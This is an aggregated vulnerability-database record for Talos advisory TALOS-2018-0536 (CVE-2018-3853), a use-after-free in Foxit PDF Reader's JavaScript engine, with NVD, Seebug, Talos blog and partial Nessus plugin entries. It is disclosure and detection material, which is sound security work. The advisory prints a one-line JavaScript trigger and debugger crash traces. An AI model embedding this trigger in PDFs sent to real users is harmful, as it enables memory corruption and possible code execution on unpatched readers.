Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability
2018-04-19T00:00:00
ID TALOS-2018-0536 Type talos Reporter Talos Intelligence Modified 2018-04-19T00:00:00
Description
Talos Vulnerability Report
TALOS-2018-0536
Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability
April 19, 2018
CVE Number
CVE-2018-3853
Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Foxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature rich PDF reader it supports JavaScript for interactive documents and dynamic forms. JavaScript support posses an additional attack surface. Additionally, Foxit PDF Reader supports XFA or XML Forms Architecture which is a new way of making interactive PDF forms.
Closing the currently active PDF document via JavaScript closeDoc call results in a clean-up of a lot of object. A stale reference to an already freed object can result in a use-after-free condition. If a document tries to create a template, but fails, an object is allocated and freed, but a stale reference to it is kept. When closing the document, this reference is reused, which can lead to memory corruption.
This particular vulnerability lies in combinations of createTemplate and closeDoc methods which trigger a use after free:
app.alert(“alloc and free follow”); this.createTemplate(“temp”); app.alert(“uaf follows”); this.closeDoc(1);
Opening the proof of concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged, due to malformed XFA objects, which is of no consequence to triggering the vulnerability):
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10fcdfd0 ebx=0feecee8 ecx=10fcdfd0 edx=0000000a esi=134fafd0 edi=00000000
eip=02393106 esp=001bdbb4 ebp=001bdbdc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
FoxitReader!CertFreeCertificateChain+0x8b6d26:
02393106 83790800 cmp dword ptr [ecx+8],0 ds:0023:10fcdfd8=????????
0:000> !heap -p -a ecx
address 10fcdfd0 found in
_DPH_HEAP_ROOT @ 7331000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
11b81bfc: 10fcd000 2000
69db90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
777569d4 ntdll!RtlDebugFreeHeap+0x0000002f
77719e5b ntdll!RtlpFreeHeap+0x0000005d
776e6416 ntdll!RtlFreeHeap+0x00000142
75b9c5f4 kernel32!HeapFree+0x00000014
02e7b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b
02583ce5 FoxitReader!CertFreeCertificateChain+0x00aa7905
02583c84 FoxitReader!CertFreeCertificateChain+0x00aa78a4
02583f71 FoxitReader!CertFreeCertificateChain+0x00aa7b91
02394e68 FoxitReader!CertFreeCertificateChain+0x008b8a88
0237bf4c FoxitReader!CertFreeCertificateChain+0x0089fb6c
023898b7 FoxitReader!CertFreeCertificateChain+0x008ad4d7
01558c17 FoxitReader+0x00178c17
01558bab FoxitReader+0x00178bab
014aeada FoxitReader+0x000ceada
014b0ae8 FoxitReader+0x000d0ae8
015f79de FoxitReader+0x002179de
015f77ab FoxitReader+0x002177ab
0160698a FoxitReader+0x0022698a
015f13f7 FoxitReader+0x002113f7
015f1218 FoxitReader+0x00211218
02cd24f9 FoxitReader!CertFreeCertificateChain+0x011f6119
02cd63fc FoxitReader!CertFreeCertificateChain+0x011fa01c
02cd648b FoxitReader!CertFreeCertificateChain+0x011fa0ab
75a9c4b7 USER32!InternalCallWinProc+0x00000023
75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b
75a94ede USER32!DispatchClientMessage+0x000000cf
75a94f4d USER32!__fnDWORD+0x00000024
776d6bae ntdll!KiUserCallbackDispatcher+0x0000002e
75a95552 USER32!SendMessageW+0x0000007c
015eee15 FoxitReader+0x0020ee15
02cd8172 FoxitReader!CertFreeCertificateChain+0x011fbd92
Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the life of the object more closely, by setting breakpoints before and after calls to createTemplate and closeDoc we can observe the following:
Above shows the object was allocated before a call closeDoc and is being freed during this call. This limits the window of opportunity that a potential attacker has to manipulate the memory and change the contents of the freed heap chunk, but it is still possible that careful manipulation of the document layout could lead to greater control.
At the time of the crash, pointer pointing to already freed memory is used as this pointer, if contents of this memory are under control, a vtable dereference could result in control flow hijacking and ultimately in arbitrary code execution.
Timeline
2018-03-05 - Vendor Disclosure
2018-04-19 - Public Release
Credit
Discovered by Aleksandar Nikolic of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2018-0551
Previous Report
TALOS-2018-0532
{"id": "TALOS-2018-0536", "bulletinFamily": "info", "title": "Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability", "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0536\n\n## Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability\n\n##### April 19, 2018\n\n##### CVE Number\n\nCVE-2018-3853\n\n### Summary\n\nAn exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\n\n### Tested Versions\n\nFoxit PDF Reader 9.0.1.1049.\n\n### Product URLs\n\n<https://www.foxitsoftware.com/products/pdf-reader/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nFoxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature rich PDF reader it supports JavaScript for interactive documents and dynamic forms. JavaScript support posses an additional attack surface. Additionally, Foxit PDF Reader supports XFA or XML Forms Architecture which is a new way of making interactive PDF forms.\n\nClosing the currently active PDF document via JavaScript `closeDoc` call results in a clean-up of a lot of object. A stale reference to an already freed object can result in a use-after-free condition. If a document tries to create a template, but fails, an object is allocated and freed, but a stale reference to it is kept. When closing the document, this reference is reused, which can lead to memory corruption.\n\nThis particular vulnerability lies in combinations of `createTemplate` and `closeDoc` methods which trigger a use after free:\n\napp.alert(\u201calloc and free follow\u201d); this.createTemplate(\u201ctemp\u201d); app.alert(\u201cuaf follows\u201d); this.closeDoc(1);\n\nOpening the proof of concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged, due to malformed XFA objects, which is of no consequence to triggering the vulnerability):\n \n \n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=10fcdfd0 ebx=0feecee8 ecx=10fcdfd0 edx=0000000a esi=134fafd0 edi=00000000\n eip=02393106 esp=001bdbb4 ebp=001bdbdc iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202\n FoxitReader!CertFreeCertificateChain+0x8b6d26:\n 02393106 83790800 cmp dword ptr [ecx+8],0 ds:0023:10fcdfd8=????????\n 0:000> !heap -p -a ecx\n address 10fcdfd0 found in\n _DPH_HEAP_ROOT @ 7331000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 11b81bfc: 10fcd000 2000\n 69db90b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 777569d4 ntdll!RtlDebugFreeHeap+0x0000002f\n 77719e5b ntdll!RtlpFreeHeap+0x0000005d\n 776e6416 ntdll!RtlFreeHeap+0x00000142\n 75b9c5f4 kernel32!HeapFree+0x00000014\n 02e7b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b\n 02583ce5 FoxitReader!CertFreeCertificateChain+0x00aa7905\n 02583c84 FoxitReader!CertFreeCertificateChain+0x00aa78a4\n 02583f71 FoxitReader!CertFreeCertificateChain+0x00aa7b91\n 02394e68 FoxitReader!CertFreeCertificateChain+0x008b8a88\n 0237bf4c FoxitReader!CertFreeCertificateChain+0x0089fb6c\n 023898b7 FoxitReader!CertFreeCertificateChain+0x008ad4d7\n 01558c17 FoxitReader+0x00178c17\n 01558bab FoxitReader+0x00178bab\n 014aeada FoxitReader+0x000ceada\n 014b0ae8 FoxitReader+0x000d0ae8\n 015f79de FoxitReader+0x002179de\n 015f77ab FoxitReader+0x002177ab\n 0160698a FoxitReader+0x0022698a\n 015f13f7 FoxitReader+0x002113f7\n 015f1218 FoxitReader+0x00211218\n 02cd24f9 FoxitReader!CertFreeCertificateChain+0x011f6119\n 02cd63fc FoxitReader!CertFreeCertificateChain+0x011fa01c\n 02cd648b FoxitReader!CertFreeCertificateChain+0x011fa0ab\n 75a9c4b7 USER32!InternalCallWinProc+0x00000023\n 75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b\n 75a94ede USER32!DispatchClientMessage+0x000000cf\n 75a94f4d USER32!__fnDWORD+0x00000024\n 776d6bae ntdll!KiUserCallbackDispatcher+0x0000002e\n 75a95552 USER32!SendMessageW+0x0000007c\n 015eee15 FoxitReader+0x0020ee15\n 02cd8172 FoxitReader!CertFreeCertificateChain+0x011fbd92\n \n\nAnalyzing the heap state clearly shows that `ecx` points into a freed memory region. If we examine the life of the object more closely, by setting breakpoints before and after calls to `createTemplate` and `closeDoc` we can observe the following:\n \n \n address 10fcdfd0 found in\n _DPH_HEAP_ROOT @ 7331000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 11b81bfc: 10fcdfd0 30 - 10fcd000 2000\n 69db8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 02e7ee12 FoxitReader!CertFreeCertificateChain+0x013a2a32\n 02583ca5 FoxitReader!CertFreeCertificateChain+0x00aa78c5\n 02583ad1 FoxitReader!CertFreeCertificateChain+0x00aa76f1\n 02583f11 FoxitReader!CertFreeCertificateChain+0x00aa7b31\n 01b69aeb FoxitReader!CertFreeCertificateChain+0x0008d70b\n 01b6a529 FoxitReader!CertFreeCertificateChain+0x0008e149\n 017291c8 FoxitReader+0x003491c8\n 02b26e8e FoxitReader!CertFreeCertificateChain+0x0104aaae\n 02b1ec76 FoxitReader!CertFreeCertificateChain+0x01042896\n 02b21023 FoxitReader!CertFreeCertificateChain+0x01044c43\n \n\nAbove shows the object was allocated before a call `closeDoc` and is being freed during this call. This limits the window of opportunity that a potential attacker has to manipulate the memory and change the contents of the freed heap chunk, but it is still possible that careful manipulation of the document layout could lead to greater control.\n\nAt the time of the crash, pointer pointing to already freed memory is used as `this` pointer, if contents of this memory are under control, a vtable dereference could result in control flow hijacking and ultimately in arbitrary code execution.\n\n### Timeline\n\n2018-03-05 - Vendor Disclosure \n2018-04-19 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0551\n\nPrevious Report\n\nTALOS-2018-0532\n", "published": "2018-04-19T00:00:00", "modified": "2018-04-19T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0536", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2018-3853"], "type": "talos", "lastseen": "2020-07-01T21:25:13", "edition": 9, "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-3853"]}, {"type": "seebug", "idList": ["SSV:97300"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_1_0_5096.NASL", "FOXIT_READER_9_1_0_5096.NASL", "FOXIT_PHANTOM_9_1_0.NASL", "FOXIT_PHANTOM_8_3_6.NASL"]}, {"type": "talosblog", "idList": ["TALOSBLOG:619D7470FB8219D4EC8B930CE64E273F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813156", "OPENVAS:1361412562310813196", "OPENVAS:1361412562310813157"]}, {"type": "kaspersky", "idList": ["KLA11237"]}], "modified": "2020-07-01T21:25:13", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-07-01T21:25:13", "rev": 2}, "vulnersScore": 6.3}, "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:52:37", "description": "An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-04T20:29:00", "title": "CVE-2018-3853", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3853"], "modified": "2018-07-31T19:41:00", "cpe": ["cpe:/a:foxitsoftware:foxit_reader:9.0.1.1049"], "id": "CVE-2018-3853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3853", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:foxitsoftware:foxit_reader:9.0.1.1049:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2018-06-08T07:08:49", "description": "### Summary\r\nAn exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\r\n\r\n### Tested Versions\r\nFoxit PDF Reader 9.0.1.1049.\r\n\r\n### Product URLs\r\nhttps://www.foxitsoftware.com/products/pdf-reader/\r\n\r\n### CVSSv3 Score\r\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nFoxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature rich PDF reader it supports JavaScript for interactive documents and dynamic forms. JavaScript support posses an additional attack surface. Additionally, Foxit PDF Reader supports XFA or XML Forms Architecture which is a new way of making interactive PDF forms.\r\n\r\nClosing the currently active PDF document via JavaScript closeDoc call results in a clean-up of a lot of object. A stale reference to an already freed object can result in a use-after-free condition. If a document tries to create a template, but fails, an object is allocated and freed, but a stale reference to it is kept. When closing the document, this reference is reused, which can lead to memory corruption.\r\n\r\nThis particular vulnerability lies in combinations of createTemplate and closeDoc methods which trigger a use after free:\r\n\r\napp.alert(\"alloc and free follow\"); this.createTemplate(\"temp\"); app.alert(\"uaf follows\"); this.closeDoc(1);\r\n\r\nOpening the proof of concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged, due to malformed XFA objects, which is of no consequence to triggering the vulnerability):\r\n```\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=10fcdfd0 ebx=0feecee8 ecx=10fcdfd0 edx=0000000a esi=134fafd0 edi=00000000\r\neip=02393106 esp=001bdbb4 ebp=001bdbdc iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202\r\nFoxitReader!CertFreeCertificateChain+0x8b6d26:\r\n02393106 83790800 cmp dword ptr [ecx+8],0 ds:0023:10fcdfd8=????????\r\n0:000> !heap -p -a ecx\r\n address 10fcdfd0 found in\r\n _DPH_HEAP_ROOT @ 7331000\r\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\r\n 11b81bfc: 10fcd000 2000\r\n 69db90b2 verifier!AVrfDebugPageHeapFree+0x000000c2\r\n 777569d4 ntdll!RtlDebugFreeHeap+0x0000002f\r\n 77719e5b ntdll!RtlpFreeHeap+0x0000005d\r\n 776e6416 ntdll!RtlFreeHeap+0x00000142\r\n 75b9c5f4 kernel32!HeapFree+0x00000014\r\n 02e7b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b\r\n 02583ce5 FoxitReader!CertFreeCertificateChain+0x00aa7905\r\n 02583c84 FoxitReader!CertFreeCertificateChain+0x00aa78a4\r\n 02583f71 FoxitReader!CertFreeCertificateChain+0x00aa7b91\r\n 02394e68 FoxitReader!CertFreeCertificateChain+0x008b8a88\r\n 0237bf4c FoxitReader!CertFreeCertificateChain+0x0089fb6c\r\n 023898b7 FoxitReader!CertFreeCertificateChain+0x008ad4d7\r\n 01558c17 FoxitReader+0x00178c17\r\n 01558bab FoxitReader+0x00178bab\r\n 014aeada FoxitReader+0x000ceada\r\n 014b0ae8 FoxitReader+0x000d0ae8\r\n 015f79de FoxitReader+0x002179de\r\n 015f77ab FoxitReader+0x002177ab\r\n 0160698a FoxitReader+0x0022698a\r\n 015f13f7 FoxitReader+0x002113f7\r\n 015f1218 FoxitReader+0x00211218\r\n 02cd24f9 FoxitReader!CertFreeCertificateChain+0x011f6119\r\n 02cd63fc FoxitReader!CertFreeCertificateChain+0x011fa01c\r\n 02cd648b FoxitReader!CertFreeCertificateChain+0x011fa0ab\r\n 75a9c4b7 USER32!InternalCallWinProc+0x00000023\r\n 75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b\r\n 75a94ede USER32!DispatchClientMessage+0x000000cf\r\n 75a94f4d USER32!__fnDWORD+0x00000024\r\n 776d6bae ntdll!KiUserCallbackDispatcher+0x0000002e\r\n 75a95552 USER32!SendMessageW+0x0000007c\r\n 015eee15 FoxitReader+0x0020ee15\r\n 02cd8172 FoxitReader!CertFreeCertificateChain+0x011fbd92\r\n```\r\n\r\nAnalyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the life of the object more closely, by setting breakpoints before and after calls to createTemplate and closeDoc we can observe the following:\r\n```\r\naddress 10fcdfd0 found in\r\n_DPH_HEAP_ROOT @ 7331000\r\nin busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 11b81bfc: 10fcdfd0 30 - 10fcd000 2000\r\n69db8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n77756206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n7771a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n776e5950 ntdll!RtlAllocateHeap+0x0000023a\r\n02e7ee12 FoxitReader!CertFreeCertificateChain+0x013a2a32\r\n02583ca5 FoxitReader!CertFreeCertificateChain+0x00aa78c5\r\n02583ad1 FoxitReader!CertFreeCertificateChain+0x00aa76f1\r\n02583f11 FoxitReader!CertFreeCertificateChain+0x00aa7b31\r\n01b69aeb FoxitReader!CertFreeCertificateChain+0x0008d70b\r\n01b6a529 FoxitReader!CertFreeCertificateChain+0x0008e149\r\n017291c8 FoxitReader+0x003491c8\r\n02b26e8e FoxitReader!CertFreeCertificateChain+0x0104aaae\r\n02b1ec76 FoxitReader!CertFreeCertificateChain+0x01042896\r\n02b21023 FoxitReader!CertFreeCertificateChain+0x01044c43\r\n```\r\n\r\nAbove shows the object was allocated before a call closeDoc and is being freed during this call. This limits the window of opportunity that a potential attacker has to manipulate the memory and change the contents of the freed heap chunk, but it is still possible that careful manipulation of the document layout could lead to greater control.\r\n\r\nAt the time of the crash, pointer pointing to already freed memory is used as this pointer, if contents of this memory are under control, a vtable dereference could result in control flow hijacking and ultimately in arbitrary code execution.\r\n\r\n### Timeline\r\n* 2018-03-05 - Vendor Disclosure\r\n* 2018-04-19 - Public Release", "published": "2018-05-17T00:00:00", "type": "seebug", "title": "Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability(CVE-2018-3853)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3853"], "modified": "2018-05-17T00:00:00", "id": "SSV:97300", "href": "https://www.seebug.org/vuldb/ssvid-97300", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "talosblog": [{"lastseen": "2018-05-23T09:24:19", "bulletinFamily": "blog", "cvelist": ["CVE-2017-14458", "CVE-2018-3842", "CVE-2018-3843", "CVE-2018-3850", "CVE-2018-3853"], "description": "### Overview\n\nTalos is disclosing five vulnerabilities in Foxit PDF Reader. [Foxit PDF Reader](<https://www.foxitsoftware.com/pdf-reader/>) is a popular free program for viewing, creating, and editing PDF documents. It is commonly used as an alternative to Adobe Acrobat Reader and has a widely used browser plugin available. Update to the current version of [Foxit PDF Reader](<https://www.foxitsoftware.com/support/security-bulletins.php>). \n\n\n### Details\n\n_Vulnerabilities Discovered by Aleksandar Nikolic_ \n\n\n#### TALOS-2017-0506\n\nTALOS-2017-0506 / CVE-2017-14458 in an exploitable use-after-free vulnerability that exists specifically in the JavaScript engine of Foxit PDF Reader. When executing embedded JavaScript code, a document can be closed, which essentially frees up a lot of used objects, but the JavaScript can continue to execute. Taking advantage of this, a specially crafted PDF document can trigger a previously freed object in memory to be reused, which results in arbitrary code execution. There are a couple of different ways an adversary could leverage this attack, including tricking a user into opening a malicious PDF. Or, if the browser plugin is enabled, simply viewing the document on the internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2017-0506>). \n \n\n\n#### TALOS-2018-0525\n\nTALOS-2018-0525 / CVE-2018-3842 results from an exploitable use of an uninitialized pointer in the Javascript engine in the Foxit PDF Reader that can result in remote code execution. A specially craft PDF file could trigger this vulnerability. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0525>). \n \n\n\n#### TALOS-2018-0526\n\nTALOS-2018-0526 / CVE-2018-3843 results from a type confusion vulnerability in the way Foxit PDF reader parses files with associated extensions. A specially crafted PDF file could trigger this vulnerability resulting in sensitive memory disclosure or, potentially, arbitrary code execution. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0526>). \n \n\n\n#### TALOS-2018-0532\n\nTALOS-2018-0532 / CVE-2018-3850 is a use-after-free vulnerability that exists in the Javascript engine of the Foxit PDF Reader. This specific vulnerability lies in the 'this.xfa.clone()' method, which results in a use-after-free condition. A specially crafted PDF file could trigger this vulnerability resulting in sensitive memory disclosure or, potentially, arbitrary code execution. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0532>). \n \n\n\n#### TALOS-2018-0536\n\nTALOS-2018-0536 / CVE-2018-3853 is a use-after-free vulnerability that exists in the JavaScript engine of the Foxit PDF Reader. The specific vulnerability lies in combinations of the 'createTemplate' and 'closeDoc' methods related to the JavaScript functionality of Foxit PDF Reader. A specially crafted PDF file could trigger this vulnerability resulting in sensitive memory disclosure or, potentially, arbitrary code execution. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0536>). \n\n\n### Coverage\n\nThe following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rule: 45158-45159, 45608-45609, 45652-45653, 45715-45716, 45823-45824 \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=C4eEW1BLh68:1K-DmsT5x08:yIl2AUoC8zA>)\n\n", "modified": "2018-04-19T17:16:32", "published": "2018-04-19T10:05:00", "id": "TALOSBLOG:619D7470FB8219D4EC8B930CE64E273F", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/C4eEW1BLh68/multiple-vulns-foxit-pdf-reader.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Issues in Foxit PDF Reader", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-04-01T02:47:27", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-27T00:00:00", "title": "Foxit PhantomPDF < 9.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17557", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_9_1_0_5096.NASL", "href": "https://www.tenable.com/plugins/nessus/109398", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109398);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\"\n );\n script_bugtraq_id(103942);\n script_xref(name:\"ZDI\", value:\"ZDI-18-312\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-313\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-315\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-329\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-330\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-331\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-332\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-335\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-339\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-340\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-341\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-342\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-344\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-345\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-346\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-348\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-349\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-350\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-351\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-352\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-354\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-358\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-359\");\n\n script_name(english:\"Foxit PhantomPDF < 9.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/27\");\n\n script_set_attribute(attribute:\"plugin_type\", 